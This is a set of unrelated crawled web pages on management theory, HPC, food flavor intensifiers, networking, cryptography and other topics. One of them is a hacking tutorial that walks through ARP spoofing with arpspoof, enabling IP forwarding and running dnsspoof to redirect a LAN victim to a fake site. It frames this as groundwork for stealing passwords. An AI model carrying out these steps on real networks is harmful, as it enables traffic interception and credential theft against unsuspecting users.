So when it comes to eSafety in schools there is a balance. And the best way to strike the right balance is to ensure student privacy and maintain an educational environment that’s flexible enough to promote good digital citizenship.Download PDF | <urn:uuid:3e6ccab4-caa1-4efc-9cca-3cec8f826f68> | CC-MAIN-2017-04 | https://www.jamf.com/resources/esafety-how-to-foster-a-safe-path-to-good-digital-citizenship-with-ipad/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285001.96/warc/CC-MAIN-20170116095125-00470-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.936705 | 498 | 3.5625 | 4 |
Over the last 239 years, organizations have been applying hierarchy, and top-down command-oriented management. This mindset erupted with the dawn of the steam engine in 1771, and in the late 1800s it was honed to razor sharpness by Frederick Winslow Taylor – the father of efficiency thinking and the science of productivity. Taylor’s work is credited with the productivity gains of the 21st century. But Taylor and his many disciples have exacted a huge toll on the role of humans in the workplace.
Taylor believed that an empirical, data-driven approach to the design of work would yield big productivity gains. His ideas are the foundation of current-day thinking about efficiency and methodologies like Six Sigma. Taylor believed that efficiency came from “knowing exactly what you want men to do, and then seeing that they do it in the best and cheapest way”. Solving the problem of inefficiency has been business’s mission for the last 239 years, and efficiency has been pursued ahead of every other goal.
As a result, humans have become cogs in business machinery pursuing efficiency. The mental image it inspires dominates organizational management and the way people work. It is a debilitating mental model that negatively influences how every executive, manager, and employee performs their role:
- There are two kinds of people in organizations, the machinery and people that control the machinery.
- Every cog has its role, and not another.
- Machines do not think, cogs do what they are told to do.
- Efficiency increases productivity – true for machines, but not so true for human endeavors.
Organizations have institutionalized the idea that we are machines awaiting instruction. It is hardly the model we would have chosen if we had the choice at the very beginning. Two hundred thirty-nine years of deterioration is much easier because it is incremental. It is hardly noticeable until something happens that makes that model unpalatable.
The global economy, the work environment, and the world around us has changed.
There is a story about coffee producers in the 1960s who experienced the collapse of the coffee crop. One producer facing cost increases for the best beans decided that instead of raising ground coffee prices they would add a lesser grade bean to their coffee. Taste tests with their coffee drinkers indicated they could not perceive a difference between the best beans and the grind with lesser beans added. The efficiency of the idea caused the producer year after year to incrementally add more of the lesser bean and make more profit. Each year their coffee drinkers validated that they could not tell the difference.
New coffees entered the market using only the best beans. They asked people new to coffee drinking to compare their new brand to the incrementalist’ brand. These new coffee drinkers found that the taste of the incremental blend was so horribly different that people were asking “Why would I want to drink that bitter coffee over this new one?” The old coffee producer had incrementally destroyed the taste of their coffee and woke up to a crisis – the only people who liked their coffee were those who stayed with the brand through the incremental changes.
Businesses today are in the same state of crisis as the coffee producer of the 1960s. By incrementally adding Taylorism to business we have removed the human aspect of business and destroyed our blend. Today we awake to a new global economic condition, new social expectations, and full swing consumerization. The businesses we have honed into efficient cog-filled environments are poised to be changed by relationship-based economics. It is an economic paradigm that demands a human-centered approach to business-consumer relationships. The impersonal economic relationship is no longer desired. Organizations must become human to their customers.
But issues with the business-consumer relationship are just the tip of the crisis. What hides below the waterline changes the fundamentals upon which every efficiency-oriented organization thinks about managing people. The nature of work is fundamentally changing. It is returning to a human and naturally social environment.
I can only imagine that the current generation entering the workforce are the new coffee drinkers who cannot believe that work has become so mechanized, impersonal, and non-participative.
We have some serious work to do in order to return humans, their cognition, their curiosity, and their interactions back into the nature of work. Work has lost ‘context’ which determines meaning and gives us the autonomy to make a relevant contribution.
Comments or opinions expressed on this blog are those of the individual contributors only, and do not necessarily represent the views of Gartner, Inc. or its management. Readers may copy and redistribute blog postings on other blogs, or otherwise for private, non-commercial or journalistic purposes, with attribution to Gartner. This content may not be used for any other purposes in any other formats or media. The content on this blog is provided on an "as-is" basis. Gartner shall not be liable for any damages whatsoever arising out of the content or use of this blog. | <urn:uuid:254114ea-5ffa-4a81-9aa0-37c91f48dfa0> | CC-MAIN-2017-04 | http://blogs.gartner.com/mike-rollings/2011/04/18/replacing-taylorism-as-our-management-doctrine/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279169.4/warc/CC-MAIN-20170116095119-00381-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.958621 | 1,019 | 3.03125 | 3 |
Consider a future where connected cars produce more efficient traffic patterns on crowded city streets and connected buildings are smart enough to reduce their own energy use. To meet growing environmental challenges in our cities, our businesses and our communities, we are creating technology that turns potential into reality.
From water pipes that detect their own leaks to sensors that warn us when perishable cargo is in danger of spoiling, our connected future is here – changing and improving our lives. This technology helps us preserve natural resources and prevent waste, avoid traffic jams and get places more efficiently, and keep our homes healthier and safer. Technology builds smart cities, smart communities and smart businesses that help us care for our planet.
We’re creating technology that empowers all of us – our 120 million wireless customers, large and small companies, big cities, little towns and more – to accomplish incredible things. Together we can tackle today’s issues to build a better tomorrow.
Looking for better battery life and a device made with environmentally preferable materials? How about a device manufactured in a place with a human rights policy? It’s time to look to the stars.
Don’t just throw your device away! When you’re ready to upgrade to the latest and greatest, help your old device find a new life. Recycle with Buyback.
Discover more through our Product Life Cycle issue brief.
5.9M gallons of unleaded gasoline avoided in 2015 through use of 11,257 Alternative Fuel Vehicles (AFVs).
We’re a large and growing company, so any change to our operations can have a big effect. That’s why we’re getting smarter about how we use energy, manage our carbon footprint, consume water, reduce waste and work with our suppliers. For example: from the Atlantic to the Pacific, you can find an AT&T alternative fuel vehicle in nearly every state of the union. But we can’t do it alone — we’re sharing what we learn through collaboration with groups such as Environmental Defense Fund so others can use and improve the tools we’ve developed. | <urn:uuid:69e0ebf4-6013-427b-a7aa-62e1fab3edab> | CC-MAIN-2017-04 | http://about.att.com/content/csr/home/planet.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00343-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.920009 | 431 | 2.5625 | 3 |
Hideaki Fujitani is a professor at Tokyo University’s Laboratory for Systems Biology and Medicine (LSBM). He has a supercomputer and aims to cure cancer with it — that according to a recent article in The Japan Times, in which Fujitani’s work is described.
According to the article, Fujitani spends most of his time running simulations of antibodies bonding, or attempting to bond, to antigens. For those of you who slept during biology class, antibodies are proteins the immune system uses to attach to antigens (foreign molecules); in this case Fujitani is studying antigens specific to cancer cells. The LSBM, led by Tatsuhiko Kodoma, is focused developing drugs for patients with recurring and advanced stages of cancer.
The simulations are aimed at making an antibody bond to and neutralize an antigen. There is one catch though, the simulation is of 30,000 to 40,000 atoms, made up of antigen, antibody and surrounding water. Also, the molecules move extremely fast, “A molecule moves in about 1 femtosecond, gradually changing the shape of proteins over microseconds,” says Fujitani, “To see the dynamics, you need to solve about one billion equations. If one CPU were able to solve one equation per second, it would still take 32 years to solve all the problems. That’s why we need the fastest supercomputer with lots of CPUs.”
Luckily for Fujitani the LSBM acquired a 612-core supercomputer in 2010 that can crack 34 teraflops. Just months after the super’s arrival, he was verifying his simulation results with an X-Ray of an actual antibody. As amazing as his work may seem, gaining support for computer-aided drug development was not so simple. He struggled to receive support from Fujitsu, his former employer, and the Japanese pharmaceutical industry, before taking his talents to the University of Tokyo.
Because of the nature of his practice, Fujitani can always use more computational power. Fortunately he will soon be getting that with a project that will tap into what is currently the fastest computer in the world, the 10-petaflop K computer. “The K will be 240 times faster than the machine here, so we can do the calculations much more quickly, and run different programs simultaneously,” he continued, “What takes a month to simulate here will be done in three or four days.”
Fujitani seems confident that the work he and the rest of Kodoma’s team will be able to find a cure for cancer. He says that in the future even people with advanced stages of cancer will be able to be cured. | <urn:uuid:cfd5c01f-10ba-427f-95a1-ae9c6cc3c0cf> | CC-MAIN-2017-04 | https://www.hpcwire.com/2012/02/13/working_fast_to_slow_things_down/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00343-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.96335 | 566 | 3.40625 | 3 |
Developed by the Military University of Technology in Poland, a new laser device is designed to detect alcohol vapor in passing cars.
Researchers reported that the device can measure blood-alcohol levels from a distance of about 65 feet. The device works using a process known as standoff detection, in which the laser is bounced off of a mirror on the opposite side of the road, but if the beam is at all absorbed by alcohol vapor, the time difference is detected and the driver is busted.
The device has not yet been used on the roads or with moving vehicles, but was sensitive enough in lab trials to detect a blood-alcohol level of 0.1 percent. (.08 is the legal limit for driving in most states.) | <urn:uuid:56cb677e-c52d-450a-a8ac-f18397aefe2e> | CC-MAIN-2017-04 | http://www.govtech.com/question-of-the-day/Question-of-the-Day-for-070814.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00251-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.967583 | 145 | 3.109375 | 3 |
|Frost & Sullivan Market Insight||Published: 22 Mar 2002|
by Ivan Fernandez
The remedy lies in flavor intensifiers - a group of ingredients that are increasingly being used to solve precisely this problem in the food industry today.
Flavor intensifiers help enhance the flavor of foods without the necessity of adding more of the actual base flavor. They do this in several ways: by sharpening the attributes of the base flavor, complementing the base flavor so as to accentuate the desired note, enhancing, smoothening, or rounding off specific notes in the flavor, minimizing undesirable aftertastes, or even extending the duration of flavor perception on the tongue. The most common flavor intensifiers are sodium chloride (salt), monosodium glutamate (MSG), nucleotides, and soy sauce.
Sodium Chloride: Its role does not end with its saltiness. It works as an effective flavor intensifier by enhancing the perception of flavors in foods. However, any use of sodium chloride as a flavor intensifier should take into account the sodium content of other ingredients in the food, the final form of the product, the maintenance of a safety threshold of total sodium content in the food (especially with regard to sodium-restricted diets), and taste preferences that vary across cultures.
MSG: The sodium salt of glutamic acid, MSG is produced by fermenting starch, sugar beet, or sugarcane. In 1908, Dr. Kikunae Ikeda identified glutamic acid as the flavor source of the traditional Japanese kelp, used in Japanese cuisine for centuries. His discovery was commercially marketed in the following year as the flavor intensifier Ajinomoto - Japanese for ‘the essence of taste’. Today, the Ajinomoto brand is synonymous with MSG, and despite negative publicity over health risks and reported adverse reactions, the brand is sold in over a hundred countries, and is the most preferred flavor intensifier currently in use. Apart from its ubiquitous role in Asian cuisine, MSG is used to intensify flavor in processed meat, canned fish, soups, salad dressings, frozen entrees, ice cream, and yogurt. Temperature as well as pH levels of foods impact the efficacy of MSG. In most cases, labeling does not accurately indicate the amount of MSG in food products, since much of it is included as part of other ingredients such as potassium glutamate, hydrolyzed vegetable protein (HVP), hydrolyzed plant protein (HPP), autolyzed yeast, and sodium and calcium caseinate.
Nucleotides: Organic compounds such as disodium inosinate (IMP) and disodium guanylate (GMP) have been used either as replacements for MSG, or to complement MSG in enhancing flavors. These compounds, called nucleotides, are most commonly used to intensify flavors in sauces, gravies, soups, meats, vegetables, flavored rice, noodles, stuffing mixes, and snacks. The most successful instance of commercialization of nucleotides has been Ribotide, introduced by Takeda in 1961. To enhance flavor five times over, Takeda’s general recommendation is a combination of 5 percent Ribotide and 95 percent MSG.
Soy Sauce: Brewed from soybean, wheat, and salt, soy sauce is normally associated with Asian cuisine. However, it is capable of adding depth and enhancing the flavor of a much wider variety of foods, such as meat, pies, hamburgers, vegetables, soups, sauces, stews, gravies, dressings, dips, barbecues, and snacks. In fact, soy sauce is increasingly being used to enhance the cocoa flavor in chocolate. Globally, the largest soy sauce manufacturer is Kikkoman, a company that prides itself on a rich heritage of soy sauce brewing that can be traced back three centuries. Despite growing recognition of the beneficial properties of soy, soy sauce has been tainted by a few health concerns, with certain studies claiming that some soy sauce products contain carcinogenic substances at unsafe levels.
High Growth Areas
Apart from the primary objective of improving the palatability of foods and beverages for the mass market, flavor intensifiers can also lend themselves to special applications with potential for high growth:
Dieting That Works: For obese consumers who have tried unsuccessfully to reduce weight by following strict dieting regimes - which meant bland and insipid food - flavor intensifiers are truly a dream come true. By inducing a sense of fullness through enhancing flavors in foods, flavor intensifiers can help dieters eat less without feeling deprived.
Spicing Up Old Age: Flavor intensifiers can also help prevent malnutrition in aged people who lose their appetite because of their diminished ability to taste and smell, on account of aging, declining health, medication, or surgery. The presence of these intensifiers significantly enriches the eating experience for the aged without the danger of health risks through over-indulgence in seasonings or sweeteners.
A Pet’s Best Friend: Flavor intensifiers also play a significant role in the pet food industry by increasing the palatability of therapeutic diets such as low fat, low-sodium, and low-protein meals for dogs and cats.
As the growing market for Asian foods is driven by greater demographic diversity and the more adventuresome spirit of consumers in the EU, North America, and Australia, flavor intensifiers that deliver bolder flavors will enjoy increased demand. These ingredients have also stepped way beyond the boundaries of Asian cuisine. Even as these changes present lucrative opportunities for the industry, there is also the challenge of health concerns, accentuated by the consumer’s heightened priority for food safety. Success is likely to go to those companies who consistently deliver that desired savory note while ensuring safety at all costs.
Frost and Sullivan's Related Research: | <urn:uuid:ee4582a1-d15f-4095-8106-7b8ec813f3f7> | CC-MAIN-2017-04 | http://www.frost.com/prod/servlet/market-insight-print.pag?docid=JEVS-5N2FLC | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00187-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.933064 | 1,188 | 2.5625 | 3 |
Welcome back my fellow hackers! There have been some articles I’ve been wanting to write regarding social engineering, more specifically, stealing passwords. But, in order to do that, there are some basic concepts and methods we needs to have a grasp of. The first of these concepts is Man in the Middle Attacks. Since we’ve already covered that, we’re going to cover the next concept, DNS spoofing. First, we’ll cover what DNS is exactly, then we’ll quickly discuss the anatomy of the DNS spoofing attack, and finally, we’ll perform the attack! So, let’s get started!
What is DNS?
This question is actually fairly simple. DNS stands for Domain Name System. You know when you go to a website using a browser, you type in a URL instead of the IP address of the server? That’s DNS working it’s magic! What DNS does is it keeps track of what IP addresses reside at what URLs, that way we don’t have to remember the addresses, just the URLs! Pretty neat, huh? Like I said, DNS is fairly simple, so let’s move on to the next part, the anatomy of a DNS spoofing attack.
Anatomy of a DNS Spoofing Attack
Since this can be a bit difficult to talk about without a reference, we’re going to be dissecting this attack based on this diagram:
As we can see here, the attacker starts by pretending to be the DNS server. Then, when the victim requests the address for the desired site, the fake server responds with whatever address the attacker wants, which in this case, directs the victim to a fake site. This attack is very simple, but can often play a part in a larger attack. Now that we know the ins and outs of DNS spoofing, let’s perform it ourselves!
Performing a DNS Spoofing Attack
Setting up the Attack
Before we really get started, there are a couple of things that we need to prepare. Namely, we need to prepare the fake website, and set up the configuration file for the DNS spoofing tool.
Let’s start by setting up the website. First, we’ll whip up some basic HTML code so we actually have a site. We’ll be using gedit. The proper file can be opened with the following command:
Now that we have our file open, just go ahead and erase everything in it. I’ll be replacing it with the following:
Feel free to replace the words with whatever you like, as long as you follow the HTML tags, everything should be fine.
Now that we have our website’s HTML code ready, we can go ahead and start the server that will serve the website. We’ll just be using the pre-installed Apache2 webserver, which can be started with the following command:
Now that we have the site up and running, we need to quickly edit the configuration file for the DNS spoofing tool. We’re just going to be modifying the /etc/hosts file and using it for our attack. We can open the file with the same command we used previously, but with the new file path. Once we have the file open, we can set up the file to tell the spoofing tool what sites we want to spoof. Before we do that, we need to know our local IP address, which we can find with the ifconfig command:
We can see that our local IP address is 10.0.0.16. Now that we know it, we can edit the file. We’re just going to be adding this line:
The line we added (the bottom one), will tell the spoofing tool that we want www.hackingloops.com to be redirected to our local IP address, which will then serve them our website instead of the real one! That’s it for the setting up, now it’s time to execute the attack!
Executing the Attack
Now, if we’re going to be redirecting traffic that isn’t ours, we need to be able to read it. This is where the Man in the Middle Attack comes into play. We’re going to place ourselves between the victim and the gateway, so that all of the victim’s DNS requests have to go through us. We can then sniff these requests and redirect them with our spoofed responses! To start, we need to know the gateway’s IP address, which we can find with the route command with the -n flag:
We can see by the above output that the address of the gateway is 10.0.0.1. For the sake of keeping this relatively short, we already have our victim’s address, which is 10.0.0.13. Note that all these addresses are on the same network. This form of DNS spoofing only works if the victim is on your LAN. Now that we have the addresses, we can start the Man in the Middle attack (finally)! We’re going to be using arpspoof for this attack, and we’ll be using the -i, -t, and -r flags to specify the interface to attack on and the addresses to attack:
Once we execute this, the MitM will start.
DO NOT FORGET: You must enable IP forwarding, so the data from the victim doesn’t get hung up on the attacking system. This can be done with this command: echo 1 > /proc/sys/net/ipv4/ip_forward
Now that we have our MitM running, we should have all the victim’s traffic flowing through the attacker system. Since we can see all this traffic, we can start the DNS spoofing tool (dnsspoof) to listen for DNS requests for www.hackingloops.com and respond to them with our IP address! Let’s go ahead and start dnsspoof now. We use the -i flag for giving an interface, and the -f flag for giving the path to the hosts file. The command to start the attack should look something like this:
We can see that dnsspoof is now listening for UDP traffic on port 53 (port 53 is the DNS port, and UDP is the transport protocol DNS uses) from all address but our own! Now that our attack is up and running, let’s move over to our victim PC and try and access www.hackingloops.com from a web browser:
Now, before we celebrate, let’s look back at dnsspoof to see the output:
There we have it! We were able to start a Man in the Middle attack, and use it to perform a DNS spoofing attack, which redirected a legitimate request for www.hackingloops.com to our fake website!
There are multiple reasons for this article. For one, we’ll be needing these attacks very soon in order to steal passwords from an unsuspecting user. Secondly, it’s a proof of concept of sorts. It shows that these smaller attacks (MitM, DNS spoofing, etc.) aren’t just one trick ponies. We can combine these attacks to achieve even greater things. Many times, when performing an actual hack, you will need to combine many different kinds of attacks at once to achieve a goal, this just proves that. I’ll see you next time! | <urn:uuid:65f1e0ad-3ff8-4e51-b5c7-9fa9ffeecb27> | CC-MAIN-2017-04 | https://www.hackingloops.com/tag/man-in-the-middle/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00095-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.928587 | 1,576 | 3.015625 | 3 |
High-performance computing (HPC) isn’t restricted to computer rooms. It is also found “embedded” within expensive gadgets. For example, it is at your local hospital inside the CAT and MR scanners. It is inspecting new semiconductors. It is inside defense RADAR and signals intelligence platforms. In fact, the market for embedded HPC is thought to be about the same size as the market for supercomputers.
Will cloud computing impact these embedded applications? Evidence exists that clouds are indeed having an impact on applications that involve sensors or local data. This is documented in VDC Research’s survey of commercial, industrial, and defense applications titled “Scalable Edge Nodes: Cloud Services for Embedded Applications”. VDC’s results were previewed at the last week’s High Performance Embedded Computing (HPEC) workshop. VDC predicted the emergence of a tiered cloud where some computing is located near the data (instead of moving all data to distant servers).
The theme of last week’s HPEC workshop was: “custom clouds and GPU chips: their impact on DoD applications”.
As the workshop progressed multiple definitions of the word “cloud” emerged. Several speakers described “cloud” as enabling pattern matching within large databases. At the opposite extreme, speakers called big microprocessors “clouds”. Finally the closing panel jumped off the technical tracks and defined “cloud” as a new business model.
One cloud application not discussed at HPEC was “utility computing” which is this community’s name for services like Amazon’s EC2 which share servers among users. Sharing is difficult when classified data is involved.
Speakers using the pattern matching definition noted that clouds are what Google and Facebook use to mine their own websites for patterns that attract advertisers. Of course the government’s interest is different: searching through things like email and telephone intercepts and then automatically pointing analysts at potential terrorists. Multiple HPEC presentations used this very example while describing the underlying middleware and database. On the hardware side, HPEC’s “data intensive” platform talks ranged from an introduction to a new supercomputer at SDSC to a description of a custom 3D-Graph microprocessor from Lincoln Labs.
Yes, marketers are now labeling single chips as clouds. Intel may have started this trend back in December when it announced a 48 core research chip as a “single chip cloud computer”. Now it seems every chip with many cores or many threads calls itself a cloud. At HPEC we saw that spin from Tilera and others.
The workshop ended with a panel of experts answering audience questions relating to the conference theme. This year Raytheon’s Niraj Srivastava responded to the very first question by describing clouds as a new kind of outsourcing. He used DISA’s RACE procurement won by HP as an example. The panel’s conversation never returned to the technical domain. Instead panel members explored service level agreements and similar concepts driving the enterprise world.
The complete HPEC theme included a focus on GPU computing as the this community is open to deploying accelerators. Many HPEC papers described science projects using GPU chips. The general impression was that GPUs speed up some algorithms but overall performance suffers from the overhead of copying data both into and out of the GPU. Multiple speakers also complained that fast GPU code is not portable. Finally, compute-enabled GPU chips consume lots of power and thus become difficult “point heat sources” within embedded systems. Nevertheless, speakers mentioned that at least two embedded vendors, Mercury Computer and GE Intelligent Platforms, have added GPU acceleration into their air-cooled product lines.
HPEC stands for High Performance Embedded Computing. The HPEC workshop is in its 14th year and always held at MIT Lincoln Laboratory near Boston. The two day event attracts roughly 200 people and is probably best known as the venue where DARPA traditionally announces new high performance computing programs. However, no programs were announced this year although the keynote speaker was outgoing DARPA TCTO office director Dr. Peter Lee. Instead Lee described the recent merger of TCTO with IPTO into a new office named I2O. He hinted that researchers should expect new programs in about six months, probably focused on exploitation and cyber security. Lee is departing DARPA to become the Managing Director of Microsoft Research Redmond.
Do the VDC survey results feel correct after listening to the entire conference? No speaker talked about a tiered cloud. No speaker debated the wisdom of moving data far away for analysis. These topics were left open, probably considered implementation details. The focus at HPEC was higher level — what new capabilities can cloud technology bring that are not currently available to analysts and “warfighters”? Who will make research dollars available to make it happen? It appears those dollars are flowing and future HPEC conferences will continue to explore the intersection of clouds with embedded applications.
The HPEC workshop’s website is http://www.ll.mit.edu/hpec. Slides used by workshop speakers will eventually appear on this site. Slides from past workshops are already there. The next HPEC is September 20-22, 2011.
About the Author
Craig Lund has a long record of successfully driving high-performance computing into profitable niche markets. That happened at Mercury Computer where he was CTO and helped pioneer adoption within medical imaging, inspection, and defense. Before Mercury, Craig led successful HPC business thrusts into large-scale decision support and real-time control.
Craig is currently consulting for a collection of defense primes, HPC vendors, and semiconductor firms. He also writes for HPC in the Cloud. You can reach him using clund ATSIGN localk DOTcom | <urn:uuid:7f073d1d-3fa7-4ae6-b289-bdc85b046c33> | CC-MAIN-2017-04 | https://www.hpcwire.com/2010/09/22/embedded_clouds_a_look_back_at_hpec_2010/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00095-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.949005 | 1,208 | 2.5625 | 3 |
Fast Ethernet (100Base-T) is an extension of IEEE802.3 CSMA/CD. Its LAN has a star topology connection for up to 210 meters in diameter using either UTP or fiber cable. Fast Ethernet use the same MAC layer as 10Base-T Ethernet, so Ethernet users can easily migrate to Fast Ethernet. Applications and higher level protocols developed on 10Base-T Ethernet will run on 100Base-T Fast Ethernet without modification, and 100Base-T adaptors are available to switch between the wide used 10 Mbps ethernet and the 100 Mbps standard. In addition to having the advantages of Ethernet, Fast Ethernet has a 100 Mbps throughput make it competitive with FDDI networks. The limit for a Ethernet is 2500m and 1024 hosts with no more than 4 repeaters between each host pair. The maximum segment length for Fast Ethernet is only 100m, up to 2000m with the fiber optic link.
FDDI (Fiber Distributed Data Interface) is a 100 Mega-bit technology using a timed token over a dual ring of trees. An FDDI network consists two independent rings that transmit data in the opposite direction, so that it is able to tolerate a single break in the cable. Each host implements a small elasticity buffer that temporarily holds the bits of a frame as they pass through the host, so that frames are able to be sent over the ring without all the hosts having to be synchronized. FDDI also allows SAS (single attachment stations) in the configuration of the ring. These improvements for FDDI give it a 100 Mbps throughput. The limit for a FDDI is 100km and 1000 hosts. FDDI can transmit a frame up to 4500 bytes, which about 3 times as much as Ethernet can do.
Are FDDI networks in danger of dying away?
Let’s compare the two technologies in terms of throughput, latency, deterministic, configuration, maintenance, compatibility, reliability, cost, user community, and interconnectivity.
- throughput – On shared media LANs such as Fast Ethernet and FDDI, line speed decreases in proportion to the number of nodes contending for a portion of the total available bandwidth. Now assume that same amount of hosts on the LAN, even thought Fast Ethernet and FDDI have the same 100 Mbps throughput, FDDI will ran faster than Fast Ethernet because there collision detection could reduce the bandwidth by 30-50%.
- latency – FDDI has much higher latency since data frames has to be passed by many hosts in between. For Ethernet, the latency is relative lower, although it is nondeterministic based on random wait after detected collision.
- deterministic – FDDI is deterministic. But Ethernet is not, because of the wait for a random time after detecting a collision.
- configuration and maintenance – It is less complicated with Ethernet LAN, because of its simple structure. Adding one more host on Ethernet is much simpler than do it on FDDI. Ethernet protocol is simple and hosts can be installed on the fly without taking the whole network down.
- distance – 100m for twisted pair and 2000m for fiber optics on Fast Ethernet segment, FDDI is clearly the better choice with a distance up to 100km.
- host load – Both Fast Ethernet and FDDI can accept up to about 1000 hosts. For FDDI, more hosts means potential longer latency. For Fast Ethernet, more hosts mean more collision and more congestion. Even worse for higher than 60% loading, the overall throughput of Ethernet could be stalled, because hosts will be busy with detecting collision/waiting, and thus are not able to transmit.
- compatibility – Ethernet users can easily migrate to Fast Ethernet. Applications and higher level protocols developed on 10Base-T Ethernet will run on 100Base-T Fast Ethernet without modification, and 100Base-T adaptors are available to switch between the wide used 10 Mbps ethernet and the 100 Mbps standard.
- reliability – Ethernet is simple, has less things to break, and thus is pretty reliable. For FDDI, the whole LAN could be brought down if one or more hosts in the ring break. The dual ring is only able to tolerate a single break in the cable.
- cost – Fast Ethernet although does not have the technical edge over FDDI in terms of speed, it is much more easier to configurate and maintain than FDDI. In addition to that, Fast Ethernet products cost a fraction to what would be for its FDDI counterparts.
- users – Ethernet has more users. One of the most important obstacles to the installation of high-performance networks are users failure to accept the new technology. In the case of Ethernet a large community of users were convinced to install a commonly agreed type of high performance network because manufacturers are able to provide standard add on features, which as they are produced in bulk, have been offer cheaper.
- interconnectivity – when FDDI and Fast Ethernet are bridged, only 50 Mbps can be handled before exhibit heavy packets loss in their Client-Server experiment. In contrast, Ethernet switches deliver dedicated bandwidth.
FDDI is more efficient with its high bandwidth at 100 Mbps level, but Fast Ethernet is the better for the latency sensitive application. Fast Ethernet is more cost effective and already a larger user community. So we believe that Fast Ethernet is the wining technology over FDDI. | <urn:uuid:f4af7c74-1498-4992-b5c8-0b226a214099> | CC-MAIN-2017-04 | http://www.fs.com/blog/fast-ethernet-100base-t-vs-fddi.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279368.44/warc/CC-MAIN-20170116095119-00491-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.921659 | 1,105 | 2.953125 | 3 |
Photo: Driving across America's heartland.
According to Saint Joseph's University sociologist Maria Kefalas, Ph.D., the heartland of America's greatest export is no longer corn and wheat, but rather its young and talented people.
With one out of every five Americans still living in non-metropolitan areas, and considering that those areas now face natural decline with more deaths than births, the problem of the youth exodus from rural America is one that simply cannot be ignored.
"The nation's food supply is undeniably linked to the region, as is the election of its presidents," says Kefalas. "Not to mention that rural America sends more of its young men and women to the military than any other region."
Kefalas is the co-author of a newly released book, Hollowing out the Middle: The Rural Brain Drain and What it Means for America published by Beacon Press, the research for which was funded by the MacArthur Foundation's Transitions to Adulthood study in 2001. Kefalas and her co-author Patrick Carr, Ph.D., traveled to "Ellis," Iowa (Ellis is a pseudonym), where they conducted interviews with young people five and 10 years out of college, as well as with local school, business and government personnel.
What they found was that, surprisingly, small towns are contributing to their own demise by encouraging the most talented and creative of their young people to leave the nest and pursue lives outside of their rural hometowns. The result is an emptying out that places these small towns in danger of extinction.
"Small towns are short-circuiting the educational and economic opportunities for their young people by not investing in those who are likely to stay and return," Kefalas maintains. "By matching the non-college-bound with vocational education and access to better job training, they will be better prepared to give back to their own communities."
Photo by Paul and Christa. CC Attribution-Noncommercial 2.0 Generic | <urn:uuid:a729bba1-7f6d-45c5-8edb-57f3569e707c> | CC-MAIN-2017-04 | http://www.govtech.com/policy-management/Americas-Heartland-and-the-Rural-Brain.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00307-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.973165 | 412 | 2.671875 | 3 |
R is a functional programming environment for business analysts and data scientists. It's a language that many non-programmers can easily work with, naturally extending a skill set that is common to high-end Excel users. It's the perfect tool for when the analyst has a statistical, numerical, or probabilities-based problem based on real data and they've pushed Excel past its limits.
In this course, you will explore common scenarios that are encountered in analysis, and present practical solutions to those challenges. Throughout the course, special attention is paid to data science theory including AI grouping theory. A discussion of using R with AI libraries like Madlib is also included.
Experience expert-led online training from the convenience of your home, office or anywhere with an Internet connection.
Train your entire team in a private, coordinated professional development session at the location of your choice.
Receive private training for teams online and in-person.
Request a date or location for this course. | <urn:uuid:30d08e09-1729-4ba2-9f56-e6ad021e5ce0> | CC-MAIN-2017-04 | https://www.globalknowledge.com/ca-en/course/134415/mastering-r-for-data-scientists-ttc01s5-r/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00031-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942224 | 197 | 2.9375 | 3 |
"The field of theoretical cryptography has blossomed in a way that I didn't anticipate in the early days," said Ron Rivest, a professor of electrical engineering and computer science at MIT and, along with Shamir and Len Adelman, one of the inventors of the RSA public-key cryptosystem. "It's related to so many other fields, information theory and others. It's much broader and richer than I imagined it would be."
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers.
In April 1977, Rivest, Shamir and Adelman published a paper called "A Method for Obtaining Digital Signatures and Public-Key Cryptosystems," (.pdf) which described a practical method for encrypting a message using a publicly shared key.
The paper picked up on the work done a year earlier by Diffie and Hellman, who had invented the concept of public-key cryptography. Until then, no one had been able to work out a practical way to transmit a decryption key to the recipient of a message. Diffie and Hellman's innovation was brilliant in its simplicity: encode the message with a shared public key and decrypt it with a private key.
The RSA paper was the beginning of digital encryption and eventually led to its wide use on the Web and in commercial software. But Hellman, an former engineering and math professor at Stanford University, said he was surprised that cryptography hadn't advanced more in the last 30 years.
"I thought there would be provably secure systems, and 30 years later, we don't have them," he said. "I thought there would be more cryptosystems as well."
But even as they noted the lack of progress in some areas, the panelists emphasized that cryptanalysis has advanced greatly and Shamir said that he expects some significant progress in the coming year on a couple of fronts. He mentioned that there are a number of serious attempts to implement an attack on the SHA-1 hash algorithm.
"I think we'll see success on that in the next few months," Shamir said. He also pointed out that cryptosystems' unfortunate tendency to fail badly when any small change is made to them, makes them somewhat difficult to implement and work with.
"The main problem with cryptography is that it's highly discontinuous. If you have a
cryptosystem and make any slight change, it can lead to devastating attacks," Shamir said. "We didn't think enough at the time about how to recover from these attacks."
